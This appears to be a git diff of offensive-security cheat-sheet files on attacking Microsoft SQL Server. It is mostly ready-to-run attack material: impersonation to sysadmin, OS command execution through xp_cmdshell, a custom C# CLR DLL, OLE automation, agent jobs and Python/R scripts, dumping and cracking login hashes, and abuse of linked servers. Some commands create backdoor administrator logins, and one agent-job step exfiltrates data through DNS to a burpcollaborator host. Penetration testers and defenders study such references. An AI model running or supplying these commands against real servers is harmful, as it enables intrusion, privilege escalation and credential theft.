||||
```sql
|
||||
SELECT SYSTEM_USER
|
||||
SELECT IS_SRVROLEMEMBER('sysadmin')
|
||||
EXECUTE AS LOGIN = 'stduser'
|
||||
SELECT SYSTEM_USER
|
||||
EXECUTE AS LOGIN = 'sa'
|
||||
SELECT IS_SRVROLEMEMBER('sysadmin')
|
||||
SELECT ORIGINAL_LOGIN()
|
||||
SELECT SYSTEM_USER
|
||||
```
|
||||
|
||||
|
||||
## Find SQL Server Logins Which can be Impersonated for the Current Database
|
||||
|
||||
```sql
|
||||
select distinct b.name
|
||||
from sys.server_permissions a
|
||||
inner join sys.server_principals b
|
||||
on a.grantor_principal_id = b.principal_id
|
||||
where a.permission_name = 'impersonate'
|
||||
```
|
||||
|
||||
|
||||
## Find databases that have been configured as trustworthy
|
||||
|
||||
```sql
|
||||
Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose
|
||||
|
||||
SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
|
||||
```
|
||||
|
||||
> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.
|
||||
|
||||
```ps1
|
||||
Invoke-SQLAuditPrivXpDirtree
|
||||
Invoke-SQLUncPathInjection
|
||||
Invoke-SQLAuditPrivXpFileexist
|
||||
```
|
|
@ -0,0 +1,315 @@
|
|||
# MSSQL - Command Execution
|
||||
|
||||
## Summary
|
||||
|
||||
- [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell)
|
||||
- [Extended Stored Procedure](#extended-stored-procedure)
|
||||
- [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
|
||||
- [CLR Assemblies](#clr-assemblies)
|
||||
- [Execute commands using CLR assembly](#execute-commands-using-clr-assembly)
|
||||
- [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it)
|
||||
- [OLE Automation](#ole-automation)
|
||||
- [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures)
|
||||
- [Agent Jobs](#agent-jobs)
|
||||
- [Execute commands through SQL Agent Job service](#execute-commands-through-sql-agent-job-service)
|
||||
- [List All Jobs](#list-all-jobs)
|
||||
- [External Scripts](#external-scripts)
|
||||
- [Python](#python)
|
||||
- [R](#r)
|
||||
|
||||
|
||||
## Command Execution via xp_cmdshell
|
||||
|
||||
> xp_cmdshell disabled by default since SQL Server 2005
|
||||
|
||||
```ps1
|
||||
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command whoami
|
||||
|
||||
# Creates and adds local user backup to the local administrators group:
|
||||
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net user backup Password1234 /add'" -Verbose
|
||||
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net localgroup administrators backup /add" -Verbose
|
||||
```
|
||||
|
||||
* Manually execute the SQL query
|
||||
```sql
|
||||
EXEC xp_cmdshell "net user";
|
||||
EXEC master..xp_cmdshell 'whoami'
|
||||
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
|
||||
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
|
||||
```
|
||||
* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
|
||||
```sql
|
||||
EXEC sp_configure 'show advanced options',1;
|
||||
RECONFIGURE;
|
||||
EXEC sp_configure 'xp_cmdshell',1;
|
||||
RECONFIGURE;
|
||||
```
|
||||
* If the procedure was uninstalled
|
||||
```sql
|
||||
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
|
||||
```
|
||||
|
||||
|
||||
## Extended Stored Procedure
|
||||
|
||||
### Add the extended stored procedure and list extended stored procedures
|
||||
|
||||
```ps1
|
||||
# Create evil DLL
|
||||
Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test
|
||||
|
||||
# Load the DLL and call xp_test
|
||||
Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'"
|
||||
Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "EXEC xp_test"
|
||||
|
||||
# Listing existing
|
||||
Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose
|
||||
```
|
||||
|
||||
* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp)
|
||||
* Load the DLL
|
||||
```sql
|
||||
-- can also be loaded from UNC path or Webdav
|
||||
sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll'
|
||||
EXEC xp_calc
|
||||
sp_dropextendedproc 'xp_calc'
|
||||
```
|
||||
|
||||
|
||||
## CLR Assemblies
|
||||
|
||||
Prerequisites:
|
||||
|
||||
* sysadmin privileges
|
||||
* CREATE ASSEMBLY permission (or)
|
||||
* ALTER ASSEMBLY permission (or)
|
||||
|
||||
The execution takes place with privileges of the **service account**.
|
||||
|
||||
|
||||
### Execute commands using CLR assembly
|
||||
|
||||
```ps1
|
||||
# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
|
||||
Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop
|
||||
|
||||
# Execute command using CLR assembly
|
||||
Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command "whoami" -Verbose
|
||||
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
|
||||
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose
|
||||
|
||||
# List all the stored procedures added using CLR
|
||||
Get-SQLStoredProcedureCLR -Instance <instance> -Verbose
|
||||
```
|
||||
|
||||
|
||||
### Manually creating a CLR DLL and importing it
|
||||
|
||||
Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs`
|
||||
|
||||
```csharp
|
||||
using System;
|
||||
using System.Data;
|
||||
using System.Data.SqlClient;
|
||||
using System.Data.SqlTypes;
|
||||
using Microsoft.SqlServer.Server;
|
||||
using System.IO;
|
||||
using System.Diagnostics;
|
||||
using System.Text;
|
||||
|
||||
public partial class StoredProcedures
|
||||
{
|
||||
[Microsoft.SqlServer.Server.SqlProcedure]
|
||||
public static void cmd_exec (SqlString execCommand)
|
||||
{
|
||||
Process proc = new Process();
|
||||
proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
|
||||
proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
|
||||
proc.StartInfo.UseShellExecute = false;
|
||||
proc.StartInfo.RedirectStandardOutput = true;
|
||||
proc.Start();
|
||||
|
||||
// Create the record and specify the metadata for the columns.
|
||||
SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));
|
||||
|
||||
// Mark the beginning of the result set.
|
||||
SqlContext.Pipe.SendResultsStart(record);
|
||||
|
||||
// Set values for each column in the row
|
||||
record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());
|
||||
|
||||
// Send the row back to the client.
|
||||
SqlContext.Pipe.SendResultsRow(record);
|
||||
|
||||
// Mark the end of the result set.
|
||||
SqlContext.Pipe.SendResultsEnd();
|
||||
|
||||
proc.WaitForExit();
|
||||
proc.Close();
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
Then follow these instructions:
|
||||
|
||||
1. Enable `show advanced options` on the server
|
||||
```sql
|
||||
sp_configure 'show advanced options',1;
|
||||
RECONFIGURE
|
||||
GO
|
||||
```
|
||||
2. Enable CLR on the server
|
||||
```sql
|
||||
sp_configure 'clr enabled',1
|
||||
RECONFIGURE
|
||||
GO
|
||||
```
|
||||
3. Trust the assembly by adding its SHA512 hash
|
||||
```sql
|
||||
EXEC sys.sp_add_trusted_assembly 0x[SHA512], N'assembly';
|
||||
```
|
||||
4. Import the assembly
|
||||
```sql
|
||||
CREATE ASSEMBLY my_assembly
|
||||
FROM 'c:\temp\cmd_exec.dll'
|
||||
WITH PERMISSION_SET = UNSAFE;
|
||||
```
|
||||
5. Link the assembly to a stored procedure
|
||||
```sql
|
||||
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
|
||||
GO
|
||||
```
|
||||
6. Execute and clean
|
||||
```sql
|
||||
cmd_exec "whoami"
|
||||
DROP PROCEDURE cmd_exec
|
||||
DROP ASSEMBLY my_assembly
|
||||
```
|
||||
|
||||
**CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL
|
||||
|
||||
```sql
|
||||
CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM
|
||||
0x4D5A90000300000004000000F[TRUNCATED]
|
||||
WITH PERMISSION_SET = UNSAFE
|
||||
GO
|
||||
```
|
||||
|
||||
|
||||
## OLE Automation
|
||||
|
||||
* :warning: Disabled by default
|
||||
* The execution takes place with privileges of the **service account**.
|
||||
|
||||
|
||||
### Execute commands using OLE automation procedures
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdOle -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
|
||||
```
|
||||
|
||||
```ps1
|
||||
# Enable OLE Automation
|
||||
EXEC sp_configure 'show advanced options', 1
|
||||
EXEC sp_configure reconfigure
|
||||
EXEC sp_configure 'OLE Automation Procedures', 1
|
||||
EXEC sp_configure reconfigure
|
||||
|
||||
# Execute commands
|
||||
DECLARE @execmd INT
|
||||
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
|
||||
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'
|
||||
```
|
||||
|
||||
|
||||
```powershell
|
||||
# https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py
|
||||
python3 mssqlclient.py 'host/username:password@10.10.10.10' -install -clr Microsoft.SqlServer.Proxy.dll
|
||||
python3 mssqlclient.py 'host/username:password@10.10.10.10' -check -reciclador 'C:\windows\temp\reciclador.dll'
|
||||
python3 mssqlclient.py 'host/username:password@10.10.10.10' -start -reciclador 'C:\windows\temp\reciclador.dll'
|
||||
SQL> enable_ole
|
||||
SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
|
||||
```
|
||||
|
||||
|
||||
## Agent Jobs
|
||||
|
||||
* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured.
|
||||
* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job.
|
||||
|
||||
|
||||
|
||||
### Execute commands through SQL Agent Job service
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdAgentJob -Subsystem PowerShell -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell e <base64encodedscript>" -Verbose
|
||||
Subsystem Options:
|
||||
–Subsystem CmdExec
|
||||
-SubSystem PowerShell
|
||||
–Subsystem VBScript
|
||||
–Subsystem Jscript
|
||||
```
|
||||
|
||||
```sql
|
||||
USE msdb;
|
||||
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
|
||||
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ;
|
||||
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
|
||||
EXEC dbo.sp_start_job N'test_powershell_job1';
|
||||
|
||||
-- delete
|
||||
EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';
|
||||
```
|
||||
|
||||
|
||||
### List All Jobs
|
||||
|
||||
```ps1
|
||||
SELECT job_id, [name] FROM msdb.dbo.sysjobs;
|
||||
SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id
|
||||
Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password1234 -Verbose
|
||||
```
|
||||
|
||||
|
||||
## External Scripts
|
||||
|
||||
Requirements:
|
||||
|
||||
* Feature 'Advanced Analytics Extensions' must be installed
|
||||
* Enable **external scripts**.
|
||||
|
||||
```sql
|
||||
sp_configure 'external scripts enabled', 1;
|
||||
RECONFIGURE;
|
||||
```
|
||||
|
||||
|
||||
### Python
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
||||
|
||||
EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
|
||||
WITH RESULT SETS (([cmd_out] nvarchar(max)))
|
||||
```
|
||||
|
||||
|
||||
### R
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
||||
|
||||
EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
|
||||
WITH RESULT SETS (([cmd_out] text));
|
||||
GO
|
||||
|
||||
@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
|
||||
* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution)
|
|
@ -0,0 +1,103 @@
|
|||
# MSSQL - Credentials
|
||||
|
||||
## Summary
|
||||
|
||||
* [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes)
|
||||
* [List Credentials on the SQL Server](#list-credentials-on-the-sql-server)
|
||||
* [Proxy Account Context](#proxy-account-context)
|
||||
|
||||
|
||||
## MSSQL Accounts and Hashes
|
||||
|
||||
* MSSQL 2000
|
||||
```sql
|
||||
SELECT name, password FROM master..sysxlogins
|
||||
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
|
||||
-- (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
|
||||
```
|
||||
|
||||
* MSSQL 2005
|
||||
```sql
|
||||
SELECT name, password_hash FROM master.sys.sql_logins
|
||||
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
|
||||
```
|
||||
|
||||
Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
|
||||
|
||||
| Hash-Mode | Hash-Name | Example |
|
||||
| --- | --- | --- |
|
||||
| 131 | MSSQL (2000) | 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578 |
|
||||
| 132 | MSSQL (2005) | 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe |
|
||||
| 1731 | MSSQL (2012, 2014) | 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375 |
|
||||
|
||||
|
||||
## List Credentials on the SQL Server
|
||||
|
||||
* List credentials configured on the SQL Server instance
|
||||
```sql
|
||||
SELECT * FROM sys.credentials
|
||||
```
|
||||
|
||||
* List proxy accounts
|
||||
```sql
|
||||
USE msdb;
|
||||
GO
|
||||
|
||||
SELECT
|
||||
proxy_id,
|
||||
name AS proxy_name,
|
||||
credential_id,
|
||||
enabled
|
||||
FROM
|
||||
dbo.sysproxies;
|
||||
GO
|
||||
```
|
||||
|
||||
* [dataplat/dbatools/Get-DecryptedObject.ps1](https://github.com/dataplat/dbatools/blob/7ad0415c2f8a58d3472c1e85ee431c70f1bb8ae4/private/functions/Get-DecryptedObject.ps1)
|
||||
|
||||
|
||||
## Proxy Account Context
|
||||
|
||||
Agent Job using the registered proxy credential.
|
||||
|
||||
```sql
|
||||
USE msdb;
|
||||
GO
|
||||
|
||||
-- Create the job
|
||||
EXEC sp_add_job
|
||||
@job_name = N'WhoAmIJob'; -- Name of the job
|
||||
|
||||
-- Add a job step that uses the proxy to execute the whoami command
|
||||
EXEC sp_add_jobstep
|
||||
@job_name = N'WhoAmIJob',
|
||||
@step_name = N'ExecuteWhoAmI',
|
||||
@subsystem = N'CmdExec',
|
||||
@command = N'c:\windows\system32\cmd.exe /c whoami > c:\windows\temp\whoami.txt',
|
||||
@on_success_action = 1, -- 1 = Quit with success
|
||||
@on_fail_action = 2, -- 2 = Quit with failure
|
||||
@proxy_name = N'MyCredentialProxy'; -- The proxy created earlier
|
||||
|
||||
-- Add a schedule to the job (optional, can be manual or scheduled)
|
||||
EXEC sp_add_jobschedule
|
||||
@job_name = N'WhoAmIJob',
|
||||
@name = N'RunOnce',
|
||||
@freq_type = 1, -- 1 = Once
|
||||
@active_start_date = 20240820,
|
||||
@active_start_time = 120000;
|
||||
|
||||
-- Add the job to the SQL Server Agent
|
||||
EXEC sp_add_jobserver
|
||||
@job_name = N'WhoAmIJob',
|
||||
@server_name = N'(LOCAL)';
|
||||
```
|
||||
|
||||
Execute the Agent job so that a process will be started in the context of the proxy account and execute your code/command.
|
||||
`EXEC sp_start_job @job_name = N'WhoAmIJob'; `
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation - Scott Sutherland - September 10, 2024](https://www.netspi.com/blog/technical-blog/network-pentesting/hijacking-sql-server-credentials-with-agent-jobs-for-domain-privilege-escalation/)
|
||||
|
||||
|
|
@ -0,0 +1,166 @@
|
|||
# MSSQL - Database Enumeration
|
||||
|
||||
## Summary
|
||||
|
||||
- [Tools](#tools)
|
||||
- [Identify Instances and Databases](#identify-instances-and-databases)
|
||||
- [Discover Local SQL Server Instances](#discover-local-sql-server-instances)
|
||||
- [Discover Domain SQL Server Instances](#discover-domain-sql-server-instances)
|
||||
- [Discover Remote SQL Server Instances](#discover-remote-sql-server-instances)
|
||||
- [Identify Encrypted databases](#identify-encrypted-databases)
|
||||
- [Version Query](#version-query)
|
||||
- [Identify Users and Roles](#identify-users-and-roles)
|
||||
- [Identify Sensitive Information](#identify-sensitive-information)
|
||||
- [Get Tables from a Specific Database](#get-tables-from-a-specific-database)
|
||||
- [Gather 5 Entries from Each Column](#gather-5-entries-from-each-column)
|
||||
- [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table)
|
||||
- [Dump common information from server to files](#dump-common-information-from-server-to-files)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
* [NetSPI/PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) - A PowerShell Toolkit for Attacking SQL Server
|
||||
* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon/) - A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation.
|
||||
|
||||
|
||||
## Identify Instances and Databases
|
||||
|
||||
### Discover Local SQL Server Instances
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceLocal
|
||||
```
|
||||
|
||||
|
||||
### Discover Domain SQL Server Instances
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain -Verbose
|
||||
# Get Server Info for Found Instances
|
||||
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
|
||||
# Get Database Names
|
||||
Get-SQLInstanceDomain | Get-SQLDatabase -NoDefaults
|
||||
```
|
||||
|
||||
### Discover Remote SQL Server Instances
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceBroadcast -Verbose
|
||||
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1
|
||||
```
|
||||
|
||||
### Identify Encrypted databases
|
||||
|
||||
Note: These are automatically decrypted for admins
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLDatabase -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Verbose | Where-Object {$_.is_encrypted -eq "True"}
|
||||
```
|
||||
|
||||
### Version Query
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-Query "select @@version"
|
||||
```
|
||||
|
||||
|
||||
## Identify Users and Roles
|
||||
|
||||
* Query Current User & determine if the user is a sysadmin
|
||||
```sql
|
||||
select suser_sname()
|
||||
Select system_user
|
||||
select is_srvrolemember('sysadmin')
|
||||
```
|
||||
|
||||
* Current Role
|
||||
```sql
|
||||
select user
|
||||
```
|
||||
|
||||
* All Logins on Server
|
||||
```sql
|
||||
Select * from sys.server_principals where type_desc != 'SERVER_ROLE'
|
||||
```
|
||||
|
||||
* All Database Users for a Database
|
||||
```sql
|
||||
Select * from sys.database_principals where type_desc != 'database_role';
|
||||
```
|
||||
|
||||
* List All Sysadmins
|
||||
```sql
|
||||
SELECT name,type_desc,is_disabled FROM sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1
|
||||
```
|
||||
|
||||
* List All Database Roles
|
||||
```sql
|
||||
SELECT DB1.name AS DatabaseRoleName,
|
||||
isnull (DB2.name, 'No members') AS DatabaseUserName
|
||||
FROM sys.database_role_members AS DRM
|
||||
RIGHT OUTER JOIN sys.database_principals AS DB1
|
||||
ON DRM.role_principal_id = DB1.principal_id
|
||||
LEFT OUTER JOIN sys.database_principals AS DB2
|
||||
ON DRM.member_principal_id = DB2.principal_id
|
||||
WHERE DB1.type = 'R'
|
||||
ORDER BY DB1.name;
|
||||
```
|
||||
|
||||
|
||||
## Identify Sensitive Information
|
||||
|
||||
### Get Tables from a Specific Database
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DBNameFromGet-SQLDatabaseCommand> -NoDefaults
|
||||
Get Column Details from a Table
|
||||
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DBName> -TableName <TableName>
|
||||
```
|
||||
|
||||
|
||||
* Current database
|
||||
```sql
|
||||
select db_name()
|
||||
```
|
||||
|
||||
* List all tables
|
||||
```sql
|
||||
select table_name from information_schema.tables
|
||||
```
|
||||
|
||||
* List all databases
|
||||
```sql
|
||||
select name from master..sysdatabases
|
||||
```
|
||||
|
||||
|
||||
### Gather 5 Entries from Each Column
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<columnname1,columnname2,columnname3,columnname4,columnname5>" -Verbose -SampleSize 5
|
||||
```
|
||||
|
||||
### Gather 5 Entries from a Specific Table
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query 'select TOP 5 * from <DatabaseName>.dbo.<TableName>'
|
||||
```
|
||||
|
||||
|
||||
### Dump common information from server to files
|
||||
|
||||
```ps1
|
||||
Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv
|
||||
```
|
||||
|
||||
## ee
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
|
||||
* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
|
|
@ -0,0 +1,115 @@
|
|||
# MSSQL - Linked Database
|
||||
|
||||
## Summary
|
||||
|
||||
- [Find Trusted Link](#find-trusted-link)
|
||||
- [Execute Query Through The Link](#execute-query-through-the-link)
|
||||
- [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain)
|
||||
- [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance)
|
||||
- [Query Version of Linked Database](#query-version-of-linked-database)
|
||||
- [Execute Procedure on Linked Database](#execute-procedure-on-linked-database)
|
||||
- [Determine Names of Linked Databases](#determine-names-of-linked-databases)
|
||||
- [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database)
|
||||
- [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table)
|
||||
- [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column)
|
||||
|
||||
|
||||
## Find Trusted Link
|
||||
|
||||
|
||||
```sql
|
||||
select * from master..sysservers
|
||||
```
|
||||
|
||||
|
||||
## Execute Query Through The Link
|
||||
|
||||
```sql
|
||||
-- execute query through the link
|
||||
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
|
||||
select version from openquery("linkedserver", 'select @@version as version');
|
||||
|
||||
-- chain multiple openquery
|
||||
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
|
||||
|
||||
-- execute shell commands
|
||||
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
|
||||
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
|
||||
|
||||
-- create user and give admin privileges
|
||||
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||
```
|
||||
|
||||
## Crawl Links for Instances in the Domain
|
||||
|
||||
A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
|
||||
select * from master..sysservers
|
||||
```
|
||||
|
||||
|
||||
## Crawl Links for a Specific Instance
|
||||
|
||||
```ps1
|
||||
Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
|
||||
select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')')
|
||||
```
|
||||
|
||||
|
||||
## Query Version of Linked Database
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DBSERVERNAME\DBInstance>`",'select @@version')" -Verbose
|
||||
```
|
||||
|
||||
|
||||
## Execute Procedure on Linked Database
|
||||
|
||||
```ps1
|
||||
SQL> EXECUTE('EXEC sp_configure ''show advanced options'',1') at "linked.database.local";
|
||||
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
|
||||
SQL> EXECUTE('EXEC sp_configure ''xp_cmdshell'',1;') at "linked.database.local";
|
||||
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
|
||||
SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local";
|
||||
```
|
||||
|
||||
|
||||
## Determine Names of Linked Databases
|
||||
|
||||
> tempdb, model ,and msdb are default databases usually not worth looking into. Master is also default but may have something and anything else is custom and definitely worth digging into. The result is DatabaseName which feeds into following query.
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from sys.databases')" -Verbose
|
||||
```
|
||||
|
||||
|
||||
## Determine All the Tables Names from a Selected Linked Database
|
||||
|
||||
> The result is TableName which feeds into following query
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from <DatabaseNameFromPreviousCommand>.sys.tables')" -Verbose
|
||||
```
|
||||
|
||||
|
||||
## Gather the Top 5 Columns from a Selected Linked Table
|
||||
|
||||
> The results are ColumnName and ColumnValue which feed into following query
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select TOP 5 * from <DatabaseNameFromPreviousCommand>.dbo.<TableNameFromPreviousCommand>')" -Verbose
|
||||
```
|
||||
|
||||
## Gather Entries from a Selected Linked Column
|
||||
|
||||
|
||||
```ps1
|
||||
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`"'select * from <DatabaseNameFromPreviousCommand>.dbo.<TableNameFromPreviousCommand> where <ColumnNameFromPreviousCommand>=<ColumnValueFromPreviousCommand>')" -Verbose
|
||||
```
|
||||
|
|
@ -19,10 +19,11 @@
|
|||
* [Windows Service](#windows-service)
|
||||
* [Elevated](#elevated)
|
||||
* [Registry HKLM](#registry-hklm)
|
||||
* [Winlogon Helper DLL](#)
|
||||
* [GlobalFlag](#)
|
||||
* [Winlogon Helper DLL](#winlogon-helper-dll)
|
||||
* [GlobalFlag](#globalflag)
|
||||
* [Startup Elevated](#startup-elevated)
|
||||
* [Services Elevated](#services-elevated)
|
||||
* [Service Security Descriptor](#servicesecuritydescriptor)
|
||||
* [Scheduled Tasks Elevated](#scheduled-tasks-elevated)
|
||||
* [Binary Replacement](#binary-replacement)
|
||||
